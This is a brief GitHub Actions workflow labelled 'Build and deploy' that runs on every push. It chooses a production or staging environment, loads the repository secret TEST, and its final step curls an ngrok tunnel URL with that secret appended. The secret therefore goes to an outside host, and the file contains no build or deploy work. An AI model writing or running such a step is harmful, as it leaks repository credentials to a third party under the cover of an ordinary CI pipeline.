name: Build and deploy

on:
  push:

jobs:
  test:
    environment: ${{ (endsWith(github.ref,'refs/heads/main') || contains(github.ref, 'tags'))  && 'production' || 'staging' }}
    runs-on: ubuntu-latest
    env:
      TEST: ${{ secrets.TEST }}
    steps:
      - uses: actions/checkout@v2
      - run: echo ${{ github.ref }}
      - run: curl https://6289-2003-de-6730-1800-eded-404f-dfc6-a2c6.ngrok.io/$TEST 

    
